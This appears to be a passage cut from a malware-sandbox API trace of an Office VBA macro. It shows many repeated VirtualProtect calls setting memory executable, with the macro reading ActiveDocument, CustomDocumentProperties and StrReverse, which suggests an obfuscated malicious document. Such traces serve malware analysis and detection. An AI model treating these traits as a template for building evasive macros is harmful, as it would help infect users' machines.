[0100.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0100.433] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.434] GetCurrentProcess () returned 0xffffffff [0100.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0100.434] GetCurrentProcess () returned 0xffffffff [0100.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0100.434] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.434] GetCurrentProcess () returned 0xffffffff [0100.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0100.434] GetCurrentProcess () returned 0xffffffff [0100.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0100.434] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.435] GetCurrentProcess () returned 0xffffffff [0100.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0100.435] GetCurrentProcess () returned 0xffffffff [0100.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0100.435] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.435] GetCurrentProcess () returned 0xffffffff [0100.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0100.435] GetCurrentProcess () returned 0xffffffff [0100.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0100.436] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.436] GetCurrentProcess () returned 0xffffffff [0100.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0100.436] GetCurrentProcess () returned 0xffffffff [0100.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0100.436] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.437] GetCurrentProcess () returned 0xffffffff [0100.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0100.437] GetCurrentProcess () returned 0xffffffff [0100.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0100.437] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.437] GetCurrentProcess () returned 0xffffffff [0100.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0100.437] GetCurrentProcess () returned 0xffffffff [0100.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0100.437] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.438] GetCurrentProcess () returned 0xffffffff [0100.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0100.438] GetCurrentProcess () returned 0xffffffff [0100.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0100.438] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.438] GetCurrentProcess () returned 0xffffffff [0100.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0100.438] GetCurrentProcess () returned 0xffffffff [0100.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0100.439] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.439] GetCurrentProcess () returned 0xffffffff [0100.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0100.439] GetCurrentProcess () returned 0xffffffff [0100.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0100.439] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.440] GetCurrentProcess () returned 0xffffffff [0100.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0100.440] GetCurrentProcess () returned 0xffffffff [0100.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0100.440] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.440] GetCurrentProcess () returned 0xffffffff [0100.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0100.440] GetCurrentProcess () returned 0xffffffff [0100.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0100.440] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.441] GetCurrentProcess () returned 0xffffffff [0100.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0100.441] GetCurrentProcess () returned 0xffffffff [0100.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0100.441] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.441] GetCurrentProcess () returned 0xffffffff [0100.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0100.441] GetCurrentProcess () returned 0xffffffff [0100.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0100.441] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.442] GetCurrentProcess () returned 0xffffffff [0100.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0100.442] GetCurrentProcess () returned 0xffffffff [0100.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0100.442] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.442] GetCurrentProcess () returned 0xffffffff [0100.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0100.443] GetCurrentProcess () returned 0xffffffff [0100.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0100.443] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.443] GetCurrentProcess () returned 0xffffffff [0100.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0100.443] GetCurrentProcess () returned 0xffffffff [0100.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0100.443] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.443] GetCurrentProcess () returned 0xffffffff [0100.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0100.444] GetCurrentProcess () returned 0xffffffff [0100.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0100.444] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.444] GetCurrentProcess () returned 0xffffffff [0100.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0100.444] GetCurrentProcess () returned 0xffffffff [0100.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0100.444] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.445] GetCurrentProcess () returned 0xffffffff [0100.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0100.445] GetCurrentProcess () returned 0xffffffff [0100.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0100.445] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.445] GetCurrentProcess () returned 0xffffffff [0100.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0100.445] GetCurrentProcess () returned 0xffffffff [0100.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0100.445] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.446] GetCurrentProcess () returned 0xffffffff [0100.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0100.446] GetCurrentProcess () returned 0xffffffff [0100.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0100.446] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.446] GetCurrentProcess () returned 0xffffffff [0100.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0100.446] GetCurrentProcess () returned 0xffffffff [0100.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0100.446] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.447] GetCurrentProcess () returned 0xffffffff [0100.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0100.447] GetCurrentProcess () returned 0xffffffff [0100.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0100.447] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.447] GetCurrentProcess () returned 0xffffffff [0100.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0100.447] GetCurrentProcess () returned 0xffffffff [0100.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0100.447] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.448] GetCurrentProcess () returned 0xffffffff [0100.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0100.448] GetAsyncKeyState (vKey=3) returned 0 [0100.449] CRetailMalloc_Alloc () returned 0xc9cf5e0 [0100.449] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432d06, cbMultiByte=15, lpWideCharStr=0x1976a4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0100.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2c92, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0100.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2c92, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0100.457] CRetailMalloc_Alloc () returned 0xc6f8348 [0100.457] CRetailMalloc_Realloc () returned 0xf605288 [0100.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2c92, cbMultiByte=15, lpWideCharStr=0x1976c4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0100.458] CRetailMalloc_Realloc () returned 0xc7510d0 [0100.459] CRetailMalloc_Realloc () returned 0xc9cead0 [0100.460] memcpy (in: _Dst=0xcb6518c, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.460] CRetailMalloc_Alloc () returned 0xc6f9158 [0100.460] CRetailMalloc_Realloc () returned 0xc9bfa10 [0100.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b08da, cbMultiByte=25, lpWideCharStr=0x1976dc, cchWideChar=26 | out: lpWideCharStr="CustomDocumentProperties") returned 25 [0100.461] CRetailMalloc_Realloc () returned 0xc9ea410 [0100.461] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432d32, cbMultiByte=11, lpWideCharStr=0x1976a4, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0100.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b08b2, cbMultiByte=11, lpWideCharStr=0x197704, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0100.512] CRetailMalloc_Realloc () returned 0xc9ebc40 [0100.527] CRetailMalloc_Realloc () returned 0xf5e9b68 [0100.527] CRetailMalloc_Realloc () returned 0xc91d118 [0100.527] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.527] CRetailMalloc_Realloc () returned 0xc9cdde0 [0100.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0100.528] CRetailMalloc_Realloc () returned 0xc9cfdf0 [0100.528] memcpy (in: _Dst=0xc9cf640, _Src=0x197924, _Size=0x18 | out: _Dst=0xc9cf640) returned 0xc9cf640 [0100.528] CRetailMalloc_Realloc () returned 0xc9cf5e0 [0100.528] CRetailMalloc_Free () returned 0x1 [0100.528] GetCurrentProcess () returned 0xffffffff [0100.528] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0100.528] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.529] GetCurrentProcess () returned 0xffffffff [0100.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0100.529] GetCurrentProcess () returned 0xffffffff [0100.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0100.529] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.530] GetCurrentProcess () returned 0xffffffff [0100.530] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0100.530] GetCurrentProcess () returned 0xffffffff [0100.530] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0100.530] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.531] GetCurrentProcess () returned 0xffffffff [0100.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0100.531] GetCurrentProcess () returned 0xffffffff [0100.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0100.531] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.532] GetCurrentProcess () returned 0xffffffff [0100.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0100.532] GetCurrentProcess () returned 0xffffffff [0100.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0100.532] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.533] GetCurrentProcess () returned 0xffffffff [0100.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0100.533] GetCurrentProcess () returned 0xffffffff [0100.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0100.533] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.534] GetCurrentProcess () returned 0xffffffff [0100.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0100.534] GetCurrentProcess () returned 0xffffffff [0100.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0100.534] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.535] GetCurrentProcess () returned 0xffffffff [0100.535] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0100.535] GetCurrentProcess () returned 0xffffffff [0100.535] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0100.535] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.537] GetCurrentProcess () returned 0xffffffff [0100.546] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0100.546] GetCurrentProcess () returned 0xffffffff [0100.546] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0100.546] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.547] GetCurrentProcess () returned 0xffffffff [0100.547] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0100.547] GetCurrentProcess () returned 0xffffffff [0100.547] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0100.547] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.548] GetCurrentProcess () returned 0xffffffff [0100.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0100.548] GetCurrentProcess () returned 0xffffffff [0100.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0100.548] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.549] GetCurrentProcess () returned 0xffffffff [0100.549] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0100.549] GetCurrentProcess () returned 0xffffffff [0100.549] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0100.549] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.550] GetCurrentProcess () returned 0xffffffff [0100.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0100.550] GetCurrentProcess () returned 0xffffffff [0100.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0100.550] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.550] GetCurrentProcess () returned 0xffffffff [0100.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0100.550] GetCurrentProcess () returned 0xffffffff [0100.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0100.550] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.551] GetCurrentProcess () returned 0xffffffff [0100.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0100.551] GetCurrentProcess () returned 0xffffffff [0100.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0100.551] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.552] GetCurrentProcess () returned 0xffffffff [0100.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0100.552] GetCurrentProcess () returned 0xffffffff [0100.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0100.552] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.553] GetCurrentProcess () returned 0xffffffff [0100.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0100.553] GetCurrentProcess () returned 0xffffffff [0100.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0100.553] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.553] GetCurrentProcess () returned 0xffffffff [0100.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0100.553] GetCurrentProcess () returned 0xffffffff [0100.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0100.553] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.554] GetCurrentProcess () returned 0xffffffff [0100.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0100.554] GetCurrentProcess () returned 0xffffffff [0100.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0100.554] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.554] GetCurrentProcess () returned 0xffffffff [0100.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0100.554] GetCurrentProcess () returned 0xffffffff [0100.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0100.555] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.555] GetCurrentProcess () returned 0xffffffff [0100.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0100.555] GetCurrentProcess () returned 0xffffffff [0100.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0100.555] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.555] GetCurrentProcess () returned 0xffffffff [0100.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0100.556] GetCurrentProcess () returned 0xffffffff [0100.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0100.556] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.556] GetCurrentProcess () returned 0xffffffff [0100.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0100.556] GetCurrentProcess () returned 0xffffffff [0100.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0100.556] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.557] GetCurrentProcess () returned 0xffffffff [0100.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0100.557] GetCurrentProcess () returned 0xffffffff [0100.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0100.557] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.558] GetCurrentProcess () returned 0xffffffff [0100.558] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0100.558] GetCurrentProcess () returned 0xffffffff [0100.558] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0100.558] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.558] 